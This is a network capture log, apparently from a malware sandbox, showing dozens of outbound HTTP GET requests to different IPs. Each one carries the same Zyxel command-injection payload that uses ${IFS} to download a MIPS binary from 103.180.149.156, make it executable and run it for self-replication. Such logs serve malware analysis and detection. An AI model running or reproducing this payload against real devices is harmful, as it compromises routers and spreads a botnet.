                                                      Feb 2, 2024 06:36:05.915389061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7643192.168.2.1437852132.114.38.109443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.915426970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7644192.168.2.1453346177.151.63.200443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.915467024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7645192.168.2.1435144187.149.210.190443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.915504932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7646192.168.2.1458604125.21.61.49443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.915535927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7647192.168.2.145161248.232.197.22443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.915580988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7648192.168.2.1442812120.216.27.150443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.915606022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7649192.168.2.145868281.36.102.21443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.915671110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7650192.168.2.144213268.87.152.183443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.915697098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7651192.168.2.144232262.75.189.97443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.915735006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7652192.168.2.1440058133.64.94.140443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.915755987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7653192.168.2.1453458146.233.181.67443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.915797949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7654192.168.2.144437694.43.208.178443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.915827990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7655192.168.2.145537638.52.227.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.915862083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7656192.168.2.1445370206.231.46.214443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.915923119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7657192.168.2.1455686109.182.253.6443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.915972948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7658192.168.2.1456854132.228.217.186443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.916023016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7659192.168.2.143866662.119.221.89443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.916038036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7660192.168.2.1434138166.45.254.242443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.916073084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7661192.168.2.1442282191.57.164.82443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.916116953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7662192.168.2.1445832146.2.139.183443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.916143894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7663192.168.2.1455432170.71.113.102443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.916174889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7664192.168.2.1447478168.238.159.223443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.916232109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7665192.168.2.144680817.82.118.98443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.916291952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7666192.168.2.1458442220.48.154.101443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.916330099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7667192.168.2.1458530130.254.159.9443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.916342974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7668192.168.2.144680027.253.143.105443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.916384935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7669192.168.2.145037099.58.124.189443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.916440010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7670192.168.2.1450840187.150.116.220443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.916480064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7671192.168.2.1456302172.35.211.199443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.916528940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7672192.168.2.144098091.83.54.46443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.916563034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7673192.168.2.1433946101.111.147.198443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.916611910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7674192.168.2.144145038.36.205.222443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.916644096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7675192.168.2.145227882.127.158.116443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.916677952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7676192.168.2.1439380158.185.254.133443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.916707039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7677192.168.2.1460238126.9.148.105443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.916750908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7678192.168.2.1447800126.253.165.1443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.916795969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7679192.168.2.1447486221.125.67.98443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.916840076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7680192.168.2.143949635.96.224.249443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.916871071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7681192.168.2.1444748177.178.17.129443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.916892052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7682192.168.2.1444988160.69.145.173443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.916943073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7683192.168.2.1451416192.22.167.117443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.916960001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7684192.168.2.1438574142.83.7.83443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.916987896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7685192.168.2.145514299.151.75.26443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.917026043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7686192.168.2.1459584139.103.11.79443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.917074919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7687192.168.2.1442976119.226.147.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.917113066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7688192.168.2.1438066220.106.75.179443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.917155981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7689192.168.2.1460714199.194.44.33443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.920756102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7690192.168.2.145018648.28.98.2443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.920780897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7691192.168.2.1443034162.207.144.51443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.920849085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7692192.168.2.1458216190.42.247.69443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.920906067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7693192.168.2.145910478.205.31.217443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.920912027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7694192.168.2.1456756117.79.65.93443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.920948982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7695192.168.2.1437538134.94.156.27443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.921005964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7696192.168.2.145012234.10.78.1443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.921044111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7697192.168.2.145611868.4.38.237443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.921089888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7698192.168.2.1435594218.207.230.132443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.921118021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7699192.168.2.1438766152.158.66.87443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.921159029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7700192.168.2.144739434.248.64.144443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.921189070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7701192.168.2.144522675.48.116.181443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.921216965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7702192.168.2.1447442107.210.106.104443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.921257973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7703192.168.2.1457500137.211.233.104443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.921319962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7704192.168.2.1449382186.41.106.76443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.930957079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7705192.168.2.143608292.139.66.170443
                                                      TimestampBytes transferredDirectionData
